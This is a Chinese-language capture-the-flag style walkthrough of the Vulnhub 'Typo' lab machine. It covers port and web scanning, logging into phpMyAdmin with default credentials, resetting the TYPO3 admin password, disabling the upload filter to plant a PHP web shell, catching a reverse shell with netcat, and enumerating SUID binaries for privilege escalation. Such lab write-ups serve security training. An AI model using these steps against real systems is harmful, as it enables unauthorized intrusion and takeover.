Vulnhub之Typo靶机详细测试过程
Typo
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:33:05:72 1 60 PCS Systemtechnik GmbH
192.168.56.145 08:00:27:5c:be:2d 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.145
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.145 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 20:30 EST
Nmap scan report for localhost (192.168.56.145)
Host is up (0.000069s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cddc8f24517354bc8762a2e6edf1c1b4 (RSA)
| 256 a939a9bfb2f701226507be1548e8ef11 (ECDSA)
|_ 256 77f5a9ffa6447c9c3441f1ec735e57bd (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Page Not Found
|_http-server-header: Apache/2.4.38 (Debian)
8000/tcp open http Apache httpd 2.4.38
|_http-title: Did not follow redirect to http://typo.local
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
8081/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:5C:BE:2D (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、8000(http)、8080(http)、8081(http)
获得Shell
端口80
Kali Linux浏览80端口,从返回页面可知目标主机80端口运行Typo3 CMS,但版本未知。
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.145
+ Target Hostname: 192.168.56.145
+ Target Port: 80
+ Start Time: 2023-03-04 20:56:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7914 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-03-04 20:58:03 (GMT-5) (89 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
端口8000
Kali Linux访问8000端口,发现浏览器重定向到:typo.local
将其加入到/etc/hosts文件中。
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.145 typo.local
刷新页面
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.145
+ Target Hostname: 192.168.56.145
+ Target Port: 8000
+ Start Time: 2023-03-04 21:44:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://typo.local
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ 7917 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-03-04 21:45:25 (GMT-5) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
端口8080
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.145
+ Target Hostname: 192.168.56.145
+ Target Port: 8080
+ Start Time: 2023-03-04 22:02:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-03-04 22:03:09 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ gobuster dir -u http://192.168.56.145 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b 403 --exclude-length 2363
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.145
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 403
[+] Exclude Length: 2363
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/03/04 20:59:33 Starting gobuster in directory enumeration mode
===============================================================
/fileadmin (Status: 301) [Size: 320] [--> http://192.168.56.145/fileadmin/]
/typo3temp (Status: 301) [Size: 320] [--> http://192.168.56.145/typo3temp/]
/typo3 (Status: 301) [Size: 316] [--> http://192.168.56.145/typo3/]
/http%3A%2F%2Fwww.php (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.html (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.txt (Status: 404) [Size: 276]
/http%3A%2F%2Fwww (Status: 404) [Size: 276]
/http%3A%2F%2Fwww.sh (Status: 404) [Size: 276]
/typo3conf (Status: 301) [Size: 320] [--> http://192.168.56.145/typo3conf/]
gobuster工具所扫描出来的/typo3目录为用户登录界面。
端口8081
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ nikto -h http://192.168.56.145:8081
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.145
+ Target Hostname: 192.168.56.145
+ Target Port: 8081
+ Start Time: 2023-03-04 22:03:27 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7917 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-03-04 22:04:16 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto 工具发现了/phpmyadmin工具,看一下有无弱口令,结果真的存在该漏洞,用root:root即可登录。
现在需要设法将数据库中admin的密码替换成自己的密码,但是数据库使用argon2加密,
用下面的在线网站产生123456的Hash值
https://www.coderstool.com/argon2-hash-generator
注意需要选择Hash算法为:Argon2id
对用户admin更新密码字段后。
访问:
http://192.168.56.145/typo3/
成功登录管理后台。
管理后台有可以上传文件的入口,但是在尝试上传shell.php,返回:Filename "shell.php" is not allowed!
尝试增加Gif文件头不能奏效。
fileDenyPattern,将此处清空。
此时再到filelist处,将shell.php上传,即可成功。
访问:
http://192.168.56.145/fileadmin/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Typo]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.145] 46740
Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
09:08:50 up 2:15, 0 users, load average: 0.01, 0.17, 3.29
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@typo:/$ ls -alh
提权
www-data@typo:/tmp$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/apache2-restart
/usr/local/bin/phpunit
www-data@typo:/tmp$
可以利用apache2-restart的SUID位提权
执行该文件会同时执行service命令
STRIVE FOR PROGRESS,NOT FOR PERFECTION
